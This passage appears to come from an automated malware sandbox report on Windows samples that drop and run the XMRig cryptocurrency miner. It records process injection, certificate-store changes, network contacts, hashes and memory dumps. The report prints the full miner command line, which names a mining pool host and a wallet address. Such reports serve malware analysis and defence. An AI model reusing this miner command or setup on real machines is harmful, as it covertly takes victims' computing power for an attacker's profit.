aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1912 wrote to memory of 5016 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1912 wrote to memory of 5016 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5016-16-0x0000022243DF0000-0x0000022243E10000-memory.dmp
memory/5016-17-0x0000022243E40000-0x0000022243E60000-memory.dmp
memory/5016-18-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-19-0x0000022245740000-0x0000022245760000-memory.dmp
memory/5016-20-0x0000022245720000-0x0000022245740000-memory.dmp
memory/5016-21-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-22-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-25-0x0000022245720000-0x0000022245740000-memory.dmp
memory/5016-24-0x0000022245740000-0x0000022245760000-memory.dmp
memory/5016-23-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-26-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-27-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-28-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-29-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-30-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-31-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-32-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-33-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-34-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-35-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-36-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-37-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-38-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-39-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-40-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-41-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-42-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-43-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-44-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-45-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-46-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-47-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-48-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-49-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-50-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-51-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-52-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-53-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-54-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-55-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-56-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-57-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-58-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-59-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-60-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-61-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-62-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-63-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-64-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-65-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-66-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-67-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-68-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-69-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-70-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-71-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-72-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-73-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-74-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-75-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-76-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-77-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-78-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-79-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-80-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-81-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-82-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-83-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-84-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1576 wrote to memory of 3840 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1576 wrote to memory of 3840 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3840-16-0x000001AC082A0000-0x000001AC082C0000-memory.dmp
memory/3840-17-0x000001AC09CE0000-0x000001AC09D00000-memory.dmp
memory/3840-18-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-19-0x000001AC09D00000-0x000001AC09D20000-memory.dmp
memory/3840-20-0x000001AC09D20000-0x000001AC09D40000-memory.dmp
memory/3840-21-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-22-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-23-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-24-0x000001AC09D00000-0x000001AC09D20000-memory.dmp
memory/3840-25-0x000001AC09D20000-0x000001AC09D40000-memory.dmp
memory/3840-26-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-27-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-28-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-29-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-30-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-31-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-32-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-33-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-34-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-35-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-36-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-37-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-38-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-39-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-40-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-41-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-42-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-43-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-44-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-45-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-46-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-47-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-48-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-49-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-50-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-51-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-52-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-53-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-54-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-55-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-56-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-57-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-58-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-59-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-60-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-61-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-62-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-63-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-64-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-65-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-66-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-67-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-68-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-69-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-70-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-71-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-72-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-73-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-74-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-75-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-76-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-77-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-78-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-79-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-80-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-81-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-82-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-83-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-84-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 19:41
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
